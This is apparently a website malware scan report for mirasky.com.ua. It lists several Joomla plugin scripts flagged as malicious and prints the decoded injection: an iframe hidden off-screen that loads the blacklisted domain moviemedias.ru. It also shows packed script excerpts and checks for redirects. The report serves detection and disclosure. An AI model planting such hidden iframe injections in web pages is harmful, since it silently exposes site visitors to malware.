Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mirasky.com.ua
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mirasky.com.ua/ | 200 OK Content-Length: 5727 Content-Type: text/html | clean |
http://mirasky.com.ua/plugins/system/2j_news_slider/jq_last.js | 200 OK Content-Length: 33439 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). Excerpt from the start of the file (truncated; the p,a,c,k,e,d wrapper shown is a common JavaScript packer and is not by itself an indicator of compromise, so the flagged portion may lie outside this excerpt):
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('(v(){B 87=1q.7;B 7=1q.7=v(M,1g){y 31 7.I.6m(M,1g)};B 8q=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,6q=/^.[^:#\\[\\.]*$/,15;7.I=7.4O={6m:v(M,1g){M=M||S;k(M.18)
Antivirus reports:
| ||
http://mirasky.com.ua/plugins/system/2j_news_slider/j.e.js | 200 OK Content-Length: 4656 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). Excerpt from the start of the file (truncated; the p,a,c,k,e,r wrapper shown is a common JavaScript packer and is not by itself an indicator of compromise, so the flagged portion may lie outside this excerpt):
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('h.i[\'1a\']=h.i[\'z\'];h.O(h.i,{y:\'D\',z:9(x,t,b,c,d){6 h.i[h.i.y](x,t,b,c,d)},17:9(x,t,b,c,d){6 c*(t/=d)*t+b},D:9(x,t,b,c,d){6-c*(t/=d)*(t-2)+b},13:9(x,t,b,c,d){e((t/
Antivirus reports:
| ||
http://mirasky.com.ua/plugins/system/2j_news_slider/jq.w.js | 200 OK Content-Length: 5230 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). Excerpt from the start of the file (truncated; the p,a,c,k,e,r wrapper shown is a common JavaScript packer and is not by itself an indicator of compromise, so the flagged portion may lie outside this excerpt):
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(6(A){A.2a.10=6(h){h=A.1I({U:1v,S:1v,R:1,1l:1,1k:\'1b\',1d:13,1u:13,L:1r,E:1Y,Q:1r,Y:1Q,1L:\'1K/1H/1E/1B/1e.29\',1y:13,1w:\'[ 1e ]\',J:\'22\',1t:\'21\',12:\'\'},h);6 1s
Antivirus reports:
| ||
http://mirasky.com.ua/components/com_proofreader/js/proofreader.js | 200 OK Content-Length: 5672 Content-Type: application/x-javascript | malicious |
Malicious code found. The script contains a blacklisted domain: moviemedias.ru
var gecko; function keyPressInit(){ if (document.addEventListener){ document.addEventListener("keypress",function(e){keyAction(e)},true); if (navigator.appName == "Microsoft Internet Explorer") return; document.addEventListener("keydown", function(e){keyAction(e)}, true); gecko = true; } else if (document.attachEvent) { document.attachEvent("onkeydown", keyAction); } else { ...[4025 bytes skipped]...
Decoded script (an iframe placed in a container positioned off-screen at top:-508px, loading the blacklisted domain): <div style="position:absolute; top:-508px;"><iframe src="http://moviemedias.ru/"></iframe></div> | ||
http://mirasky.com.ua/components/com_proofreader/js/xajax.js | 200 OK Content-Length: 18171 Content-Type: application/x-javascript | clean |
http://mirasky.com.ua/media/system/js/caption.js | 200 OK Content-Length: 3422 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). Excerpt from the start of the file (truncated; the flagged portion may lie outside this excerpt):
var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align =
Antivirus reports:
| ||
http://mirasky.com.ua/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 10419 Content-Type: application/x-javascript | malicious |
Malicious code found. The script contains a blacklisted domain: moviemedias.ru
function Jax(){var loadingTimeout=400;var iframe;this.loadingFunction=function(){};this.doneLoadingFunction=function(){};this.stringify=function(arg){var c,i,l,o,u,v;switch(typeof arg){case"object":if(arg){if(arg.constructor==Array){o="";for(i=0;i<arg.length;++i){v=this.stringify(arg[i]);if(o&&(v!==u)){o+=","}if(v!==u){o+=v}}return"["+o+"]"}else{if(typeof arg.toString!="undefined"){o="";for(i in arg){v=this.stringify(arg[i]);if(v!==u){if(o){ ...[3587 bytes skipped]...
Decoded script (an iframe placed in a container positioned off-screen at top:-508px, loading the blacklisted domain): <div style="position:absolute; top:-508px;"><iframe src="http://moviemedias.ru/"></iframe></div> | ||
http://mirasky.com.ua/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mirasky.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 11:42:21 GMT
Pragma: no-cache
Server: nginx/1.2.4
Vary: Accept-Encoding,User-Agent
Content-Length: 5727
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 11:42:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78ef23805ce829b7e520b8e008f40fe9=fqb55mhs1cb2qv0o15ds6lbrq5; path=/
X-Powered-By: PHP/5.3.27
...5727 bytes of data.
GET / HTTP/1.1
Host: mirasky.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 11:42:21 GMT
Pragma: no-cache
Server: nginx/1.2.4
Vary: Accept-Encoding,User-Agent
Content-Length: 5727
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 11:42:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78ef23805ce829b7e520b8e008f40fe9=fqb55mhs1cb2qv0o15ds6lbrq5; path=/
X-Powered-By: PHP/5.3.27
...5727 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mirasky.com.ua
Referer: http://www.google.com/search?q=mirasky.com.ua
Result:
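The response is similar to the first query; no suspicious redirects were found. This check covers only the Google search referer shown in the request above, so a redirect conditioned on a different referer or user agent would not appear here.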
GET / HTTP/1.1
Host: mirasky.com.ua
Referer: http://www.google.com/search?q=mirasky.com.ua
Result:
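The response is similar to the first query; no suspicious redirects were found. This check covers only the Google search referer shown in the request above, so a redirect conditioned on a different referer or user agent would not appear here.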